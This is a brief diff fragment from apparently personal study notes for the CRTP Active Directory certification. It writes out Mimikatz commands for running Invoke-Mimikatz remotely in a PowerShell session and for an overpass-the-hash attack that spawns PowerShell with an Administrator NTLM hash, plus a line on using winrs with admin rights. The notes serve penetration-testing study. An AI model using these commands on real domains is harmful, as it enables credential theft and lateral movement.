0xd4y/Notes/Active Directory/CRTP/README.md

     - you can run this remotely within a session: `Invoke-Command -ScriptBlock ${function:Invoke-Mimikatz} -Session $session`
 - use `Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:follow-dc /ntlm:<NTLMHASH> /run:powershell.exe"'`  to generate tokens from hashes ← writing to LSASS
     - this is an overpass-the-hash attack - creates a ticket using NTLM hash of user
+- the `winrs` command works on a remote computer if you have admin privileges on it

 **Interacting with Script Inside Session**